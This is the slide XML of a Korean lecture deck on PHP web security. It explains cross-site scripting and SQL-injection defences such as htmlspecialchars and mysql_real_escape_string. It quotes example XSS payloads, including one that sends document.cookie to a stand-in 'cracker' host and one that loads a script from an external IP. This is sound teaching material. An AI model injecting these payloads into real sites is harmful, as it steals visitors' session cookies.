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8" r:id="rId6"/>
    <p:sldId id="269" r:id="rId7"/>
    <p:sldId id="263" r:id="rId8"/>
    <p:sldId id="265" r:id="rId9"/>
    <p:sldId id="259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8A353A-BA9E-4BF2-B5CE-5CA3F9F86998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FB8E11-6006-4334-9DAB-B976E3E3F0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53A-BA9E-4BF2-B5CE-5CA3F9F86998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11-6006-4334-9DAB-B976E3E3F0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53A-BA9E-4BF2-B5CE-5CA3F9F86998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11-6006-4334-9DAB-B976E3E3F0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53A-BA9E-4BF2-B5CE-5CA3F9F86998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11-6006-4334-9DAB-B976E3E3F04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53A-BA9E-4BF2-B5CE-5CA3F9F86998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11-6006-4334-9DAB-B976E3E3F04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53A-BA9E-4BF2-B5CE-5CA3F9F86998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11-6006-4334-9DAB-B976E3E3F04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53A-BA9E-4BF2-B5CE-5CA3F9F86998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11-6006-4334-9DAB-B976E3E3F0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53A-BA9E-4BF2-B5CE-5CA3F9F86998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11-6006-4334-9DAB-B976E3E3F04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353A-BA9E-4BF2-B5CE-5CA3F9F86998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11-6006-4334-9DAB-B976E3E3F0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F8A353A-BA9E-4BF2-B5CE-5CA3F9F86998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11-6006-4334-9DAB-B976E3E3F0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8A353A-BA9E-4BF2-B5CE-5CA3F9F86998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FB8E11-6006-4334-9DAB-B976E3E3F04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8A353A-BA9E-4BF2-B5CE-5CA3F9F86998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FB8E11-6006-4334-9DAB-B976E3E3F0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gi-bin/test.php?code=phpqn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62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="365760" indent="-256032" eaLnBrk="1" fontAlgn="auto" hangingPunct="1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2900" dirty="0" smtClean="0"/>
              <a:t>크로스 사이트 스크립트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2900" dirty="0" smtClean="0"/>
              <a:t>(Cross Site Script : XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="12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900" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>해킹의 대표적인 기법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2900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en-US" altLang="ko-KR" sz="2900" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2900" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>취약점</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2900" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2900" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>은 보안에 대한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>지식이 없는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2900" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>웹프로그래머에 의해 개발된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2900" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2900" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>어플리케이션에서 발견되는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>어플리케이션</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2900" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>(HTTP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2900" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>관련 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>취약점</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2900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en-US" altLang="ko-KR" sz="2900" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2900" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>따라서 방화벽이나 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2900" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>IDS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>바이러스백신등과 같은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2900" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>기존의 보안대책들이 이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2900" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2900" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>취약점에 대해서는 거의 감지하지 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>못하는 현실임</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2900" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>침입 탐지 시스템</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2900" b="1" dirty="0" err="1"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2900" dirty="0" err="1"/>
              <a:t>:Intrusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2900" dirty="0"/>
              <a:t> Detection System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2900" dirty="0" smtClean="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2900" dirty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ko-KR" altLang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>인터넷 상에서 악성코드를 유포하거나 컴퓨터 실행기록인 쿠키 파일을 빼낼 때 사용되는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2900" dirty="0" err="1" smtClean="0"/>
              <a:t>해킹기법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2900" dirty="0" err="1" smtClean="0"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2900" dirty="0"/>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2900" dirty="0" smtClean="0"/>
              <a:t>cracker/cookie.php?cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2900" dirty="0"/>
              <a:t>="+document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2900" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>이용자가 이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2900" dirty="0" smtClean="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>스크립트가 심어진 게시물을 클릭하면 자신도 모르는 새 악성코드에 감염되거나 쿠키파일이 해커에게 넘어갈 수 있음</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="393192" lvl="1" indent="0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ko-KR" altLang="en-US" dirty="0" smtClean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 smtClean="0"/>
              <a:t>&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>웹 프로그램 보안 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="28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 marL="621792" lvl="1">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="324"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="◦"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>PHP.INI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>파일에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>magic_quotes_gpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>=on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="324"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="◦"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>또 하나의 예는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>와 같은 특수문자 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="859536" lvl="2">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t> 아직도 많은 웹 페이지 회원가입 폼 또는 쇼핑몰 결제내용에 있는 우편번호 찾기 보통 팝업이 떠서 동을 함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="859536" lvl="2">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>여기에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>만 넣고 찾기를 클릭하면 우편번호 약 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>40000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>건 이상을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>전부 다 찾게 됨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>단순공격이지만 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>여러 개의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>창으로 실행하면 서버는 엄청난 부하를 가지게 됨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70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr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mysql_real_escape_string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unescaped_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>link_ident</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>unecaped_sting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>된 문자열에서 특수 문자열을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>이스케이프하여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mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>수행시</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> 안전하게 질의 할 수 있게 함</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>x00, \n, \r,  \, ’, ’’, ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>질의 전송하기 전에 안전한 데이터 생성을 위해 항상 사용바람</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>SQL Injection Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>에 취약점을 막을 수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>있음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" smtClean="0"/>
              <a:t>단</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>, % , _ 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이스케이프 하지 않음</a:t>
            </a:r>
          </a:p>
          <a:p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33375"/>
            <a:ext cx="8229600" cy="5615905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="365760" indent="-256032" eaLnBrk="1" fontAlgn="auto" hangingPunct="1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6400" dirty="0" smtClean="0"/>
              <a:t>게시판에 새 게시물을 작성하여 등록할 때와 같이 사용자의 입력을 받아 처리하는 웹 프로그램에서 입력 내용에 대해 실행 코드인 스크립트의 태그를 적절히 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="6400" dirty="0" err="1" smtClean="0"/>
              <a:t>필터링하지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="6400" dirty="0" smtClean="0"/>
              <a:t> 않을 경우에 악의적인 스크립트가 포함된 게시물을 등록할 수 있어 해당 게시물을 열람하는 일반 사용자의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" smtClean="0"/>
              <a:t>PC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="6400" dirty="0" smtClean="0"/>
              <a:t>로부터 개인 정보인 쿠키를 유출할 수 있는 등의 피해를 초래할 수 있음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-256032" eaLnBrk="1" fontAlgn="auto" hangingPunct="1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6400" dirty="0" smtClean="0"/>
              <a:t>예를 들어 글쓰기 본문에 다음과 같은 스크립트 문장을 입력했을 때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" smtClean="0"/>
              <a:t>'XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="6400" dirty="0" smtClean="0"/>
              <a:t>취약점 존재</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="6400" dirty="0" err="1" smtClean="0"/>
              <a:t>경고창이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="6400" dirty="0" smtClean="0"/>
              <a:t> 뜨면 스크립트가 수행된 것이므로 취약점이 있는 것이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-256032" eaLnBrk="1" fontAlgn="auto" hangingPunct="1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sz="6400" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" smtClean="0"/>
              <a:t> XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="6400" dirty="0" smtClean="0"/>
              <a:t>취약점 존재</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="6400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" smtClean="0"/>
              <a:t>) ; &lt; /script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-256032" eaLnBrk="1" fontAlgn="auto" hangingPunct="1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sz="6400" dirty="0" smtClean="0"/>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" smtClean="0"/>
              <a:t>=“http://205.34.23.45:3000/aa.js”&gt;&lt;/script&gt;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ko-KR" sz="6400" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0"/>
              <a:t>A HREF='http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="6400" dirty="0"/>
              <a:t>공격자사이트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" err="1" smtClean="0"/>
              <a:t>text.php?str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0"/>
              <a:t>=&lt;script&gt;alert("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" err="1"/>
              <a:t>Merong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0"/>
              <a:t>~") ;&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" smtClean="0"/>
              <a:t>&gt;'&gt;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ko-KR" sz="6400" dirty="0" smtClean="0"/>
              <a:t>&lt; , &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="6400" dirty="0" smtClean="0"/>
              <a:t>와 같은 태그가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" smtClean="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" err="1" smtClean="0"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" smtClean="0"/>
              <a:t>;   , &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" err="1" smtClean="0"/>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="6400" dirty="0" smtClean="0"/>
              <a:t>로 치환되어야 함</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-256032" eaLnBrk="1" fontAlgn="auto" hangingPunct="1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sz="6400" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="6400" dirty="0" smtClean="0"/>
              <a:t>로 바꾸어야 함</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-256032" eaLnBrk="1" fontAlgn="auto" hangingPunct="1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sz="6400" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlentites</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-256032" eaLnBrk="1" fontAlgn="auto" hangingPunct="1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sz="6400" dirty="0" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" err="1" smtClean="0"/>
              <a:t>tr_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" smtClean="0"/>
              <a:t>(“&lt;“, ”&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" err="1" smtClean="0"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" smtClean="0"/>
              <a:t>;” ,$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" err="1" smtClean="0"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="64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38862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ko-KR" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>&lt; explode 함수 &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>seperator(지정한 문자)로  str문자열을 분리하여 배열로 반환함</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>array explode(string seperator, string str)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
